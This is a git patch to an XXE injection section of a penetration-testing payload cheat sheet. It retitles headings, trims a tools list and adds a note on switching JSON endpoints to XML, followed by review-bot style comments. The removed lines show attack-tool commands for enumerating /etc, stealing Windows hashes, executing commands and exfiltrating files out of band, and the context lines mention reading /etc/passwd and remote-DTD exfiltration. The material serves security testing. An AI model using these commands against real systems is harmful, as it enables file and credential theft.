From 846706b87dac4cbd74990d802f103f8fbb1c47ab Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 18 Nov 2024 10:43:39 +0100 Subject: [PATCH] XXE on JSON Endpoints --- XXE Injection/README.md | 172 +++++++++++++++++++--------------------- 1 file changed, 82 insertions(+), 90 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index c0d3ffe..05908f4 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
@@ -6,34 +6,36 @@ ## Summary - [Tools](#tools) -- [Detect the vulnerability](#detect-the-vulnerability) -- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files) +- [Detect The Vulnerability](#detect-the-vulnerability) +- [Exploiting XXE to Retrieve Files](#exploiting-xxe-to-retrieve-files) - [Classic XXE](#classic-xxe) - - [Classic XXE Base64 encoded](#classic-xxe-base64-encoded) - - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe) - - [XInclude attacks](#xinclude-attacks) -- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks) -- [Exploiting XXE to perform a denial of service](#exploiting-xxe-to-perform-a-denial-of-service) + - [Classic XXE Base64 Encoded](#classic-xxe-base64-encoded) + - [PHP Wrapper Inside XXE](#php-wrapper-inside-xxe) + - [XInclude Attacks](#xinclude-attacks) +- [Exploiting XXE to Perform SSRF Attacks](#exploiting-xxe-to-perform-SSRF-attacks) +- [Exploiting XXE to Perform a Denial of Service](#exploiting-xxe-to-perform-a-denial-of-service) - [Billion Laugh Attack](#billion-laugh-attack) - - [YAML attack](#yaml-attack) - - [Parameters Laugh attack](#parameters-laugh-attack) + - [YAML Attack](#yaml-attack) + - [Parameters Laugh Attack](#parameters-laugh-attack) - [Exploiting Error Based XXE](#exploiting-error-based-xxe) - [Error Based - Using Local DTD File](#error-based---using-local-dtd-file) - [Error Based - Using Remote DTD](#error-based---using-remote-dtd) -- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) +- [Exploiting Blind XXE to Exfiltrate Data Out Of Band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) - [Blind XXE](#blind-xxe) - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013) - - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter) + - [XXE OOB with DTD and PHP Filter](#xxe-oob-with-dtd-and-php-filter) - [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf) +- [XXE with Local 
DTD](#xxe-with-local-dtd) - [WAF Bypasses](#waf-bypasses) - - [Bypass via character encoding](#bypass-via-character-encoding) + - [Bypass via Character Encoding](#bypass-via-character-encoding) + - [XXE on JSON Endpoints](#xxe-on-json-endpoints) - [XXE in Java](#xxe-in-java) -- [XXE in exotic files](#xxe-in-exotic-files) - - [XXE inside SVG](#xxe-inside-svg) - - [XXE inside SOAP](#xxe-inside-soap) - - [XXE inside DOCX file](#xxe-inside-docx-file) - - [XXE inside XLSX file](#xxe-inside-xlsx-file) - - [XXE inside DTD file](#xxe-inside-dtd-file) +- [XXE in Exotic Files](#xxe-in-exotic-files) + - [XXE Inside SVG](#xxe-inside-svg) + - [XXE Inside SOAP](#xxe-inside-soap) + - [XXE Inside DOCX file](#xxe-inside-docx-file) + - [XXE Inside XLSX file](#xxe-inside-xlsx-file) + - [XXE Inside DTD file](#xxe-inside-dtd-file) - [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents) - [Labs](#labs) - [References](#references) 
@@ -41,58 +43,14 @@ ## Tools -- [xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads - ```ps1 - sudo ./xxeftp -uno 443 - ./xxeftp -w -wps 5555 - ``` -- [230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/) - ```ps1 - $ python3 230.py 2121 - ``` -- [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods - ```ps1 - # Enumerating /etc directory in HTTPS application: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl - # Enumerating /etc directory using gopher for OOB method: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher - # Second order exploitation: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt - # Bruteforcing files using HTTP out of band method and netdoc protocol: - ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc - # Enumerating using direct exploitation: - ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK - # Enumerating unfiltered ports: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all - # Stealing Windows hashes: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes - # Uploading files using Java jar: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf - # Executing system commands using PHP expect: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls - # Testing for XSLT injection: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt - # Log requests only: - ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt - ``` -- 
[oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF) - ```ps1 - ruby server.rb - ``` -- [docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc - ```ps1 - ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx - ./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place - ./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place - ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_file -kt -sx docx - ``` -- [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities. - ```ps1 - python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs - ``` +- [staaldraad/xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads +- [lc/230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/) +- [enjoiz/XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods +- [BuffaloWill/oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF) +- [whitel1st/docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc -## Detect the vulnerability +## 
Detect The Vulnerability **Internal Entity**: If an entity is declared within a DTD it is called an internal entity. Syntax: `` @@ -113,7 +71,7 @@ Basic entity test, when the XML parser parses the external entities the result s It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server. -## Exploiting XXE to retrieve files +## Exploiting XXE to Retrieve Files ### Classic XXE @@ -153,13 +111,13 @@ We try to display the content of the file `/etc/passwd`. ``` -### Classic XXE Base64 encoded +### Classic XXE Base64 Encoded ```xml %init; ]> ``` -### PHP Wrapper inside XXE +### PHP Wrapper Inside XXE ```xml ]> @@ -183,7 +141,7 @@ We try to display the content of the file `/etc/passwd`. &xxe; ``` -### XInclude attacks +### XInclude Attacks When you can't modify the **DOCTYPE** element use the **XInclude** to target @@ -194,7 +152,7 @@ When you can't modify the **DOCTYPE** element use the **XInclude** to target -## Exploiting XXE to perform SSRF attacks +## Exploiting XXE to Perform SSRF Attacks XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network. @@ -208,7 +166,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo ``` -## Exploiting XXE to perform a denial of service +## Exploiting XXE to Perform a Denial of Service :warning: : These attacks might kill the service or the server, do not use them on the production. @@ -225,7 +183,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo &a4; ``` -### YAML attack +### YAML Attack ```xml a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] 
@@ -239,7 +197,7 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` -### Parameters Laugh attack +### Parameters Laugh Attack A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping. @@ -334,7 +292,7 @@ Let's break down the payload: -## Exploiting blind XXE to exfiltrate data out-of-band +## Exploiting Blind XXE to Exfiltrate Data Out of Band Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack. @@ -376,7 +334,7 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd %all; ``` -### XXE OOB with DTD and PHP filter +### XXE OOB with DTD and PHP Filter ```xml @@ -415,7 +373,7 @@ Send the XML file to the `deploy` folder. Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) -## XXE with local DTD +## XXE with Local DTD In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this: ```xml @@ -451,26 +409,33 @@ Assuming payloads such as the previous return a verbose error. You can start poi ]> ``` + ### Cisco WebEx -``` + +```xml Your DTD code %local_dtd; ``` + ### Citrix XenMobile Server -``` + +```xml Your DTD code %local_dtd; ``` -[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) + +* [GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) - List DTDs and generate XXE payloads using those local DTDs. + ## WAF Bypasses -### Bypass via character encoding +### Bypass via Character Encoding XML parsers uses 4 methods to detect encoding: + * HTTP Content Type: `Content-Type: text/xml; charset=utf-8` * Reading Byte Order Mark (BOM) * Reading first symbols of document 
@@ -491,6 +456,31 @@ XML parsers uses 4 methods to detect encoding: cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml ``` + +### XXE on JSON Endpoints + +In the HTTP request try to switch the `Content-Type` from **JSON** to **XML**, + +| Content Type | Data | +| ------------------ | ---------------------------------- | +| `application/json` | `{"search":"name","value":"test"}` | +| `application/xml` | `namedata` | + + +* XML documents must contain one root (``) element that is the parent of all other elements. +* The data must be converted to XML too, otherwise the server will respond with an error. + +```json +{ + "errors":{ + "errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity." + } +} +``` + +* [NetSPI/Content-Type Converter](https://github.com/NetSPI/Burp-Extensions/releases/tag/1.4) + + ## XXE in Java Insecure configuration in 10 different Java classes from three XML processing interfaces (DOM, SAX, StAX) that can lead to XXE: @@ -512,9 +502,10 @@ Ref. - [Semgrep - XML Security in Java](https://semgrep.dev/blog/2022/xml-security-in-java) - [Semgrep - XML External entity prevention for Java](https://semgrep.dev/docs/cheat-sheets/java-xxe/) -## XXE in exotic files -### XXE inside SVG +## XXE in Exotic Files + +### XXE Inside SVG ```xml @@ -565,7 +556,7 @@ _xxe.svg_ "> ``` -### XXE inside SOAP +### XXE Inside SOAP ```xml @@ -575,7 +566,7 @@ _xxe.svg_ ``` -### XXE inside DOCX file +### XXE Inside DOCX file Format of an Open XML file (inject the payload in any .xml file): @@ -600,11 +591,11 @@ JPG (experimental) GIF (experimental) ``` -### XXE inside XLSX file +### XXE Inside XLSX file Structure of the XLSX: -``` +```ps1 $ 7z l xxe.xlsx [...] Date Time Attr Size Compressed Name 
@@ -667,7 +658,7 @@ Serve DTD and receive FTP payload using [xxeserv](https://github.com/staaldraad/ $ xxeserv -o files.log -p 2121 -w -wd public -wp 8000 ``` -### XXE inside DTD file +### XXE Inside DTD file Most XXE payloads detailed above require control over both the DTD or `DOCTYPE` block as well as the `xml` file. In rare situations, you may only control the DTD file and won't be able to modify the `xml` file. For example, a MITM. @@ -752,6 +743,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79 - [OOB XXE through SAML - Sean Melia (@seanmeals) - January 2016](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) - [Payloads for Cisco and Citrix - Arseniy Sharoglazov - January 1, 2016](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - [Pentest XXE - @phonexicum - March 9, 2020](https://phonexicum.github.io/infosec/xxe.html) +- [Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari - April 20, 2015](https://www.netspi.com/blog/technical-blog/web-application-pentesting/playing-content-type-xxe-json-endpoints/) - [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - Optistream - May 27, 2024](https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe) - [XML attacks - Mariusz Banach (@mgeeky) - December 21, 2017](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) - [XML external entity (XXE) injection - PortSwigger - May 29, 2019](https://portswigger.net/web-security/xxe)
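Review bot: In the Summary hunk (`@@ -6,34 +6,36 @@`) the retitled entry `- [Exploiting XXE to Perform SSRF Attacks](#exploiting-xxe-to-perform-SSRF-attacks)` keeps the uppercase `SSRF` in its fragment even though the generated heading id is all lowercase; lowercasing it to `#exploiting-xxe-to-perform-ssrf-attacks` avoids a case-sensitive fragment mismatch. In the same hunk the new entry reads `Exploiting Blind XXE to Exfiltrate Data Out Of Band` while the heading introduced in `@@ -334,7 +292,7 @@` reads `Out of Band`; pick one capitalization for both, and likewise `XXE Inside DOCX file` / `XLSX file` / `DTD file` mix title case with a lowercase `file`.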
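Review bot: The Tools hunk (`@@ -41,58 +43,14 @@`) does more than the subject "XXE on JSON Endpoints" says: it drops every usage snippet (the `xxeftp`, `230.py`, `XXEinjector.rb`, `server.rb` and `docem.py` command lines) and removes the `[otori]` entry entirely rather than trimming it like the other tools. If that removal is intentional it should be mentioned in the commit message or split into its own commit; otherwise keep the `otori` bullet in the shortened `author/repo - description` form used for the remaining entries.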
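Review bot: In the local-DTD hunk (`@@ -451,26 +409,33 @@`) the new bullet `* [GoSecure/dtd-finder](...)` uses `*` as the list marker, whereas the Summary, Tools and References lists in this file use `-`; keeping one marker across the file is a small consistency win. Tagging the previously bare fences as ```xml and adding blank lines around the `### Cisco WebEx` / `### Citrix XenMobile Server` headings is a welcome cleanup.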
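Review bot: In the new `### XXE on JSON Endpoints` section (`@@ -491,6 +456,31 @@`) the lead sentence `In the HTTP request try to switch the `Content-Type` from **JSON** to **XML**,` ends with a comma and should end with a colon or period before the table. The section also stops at the `SAXParseException` error without saying what the reader should do with it: a sentence noting that a `SAXParseException` in the response confirms the body is now reaching an XML parser, at which point the entity payloads from the earlier sections apply, would close the loop. Finally, the hunk introduces double blank lines before `### XXE on JSON Endpoints` and before `## XXE in Java`; a single blank line matches the rest of the file.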
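Review bot: In the References hunk (`@@ -752,6 +743,7 @@`) the new entry `- [Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari - April 20, 2015](...)` uses an en dash (`–`) inside the title while every neighbouring entry separates title, author and date with a plain ` - `; using the plain hyphen keeps the list uniform. The alphabetical placement between the `Pentest XXE` and `REDTEAM TALES` entries is correct.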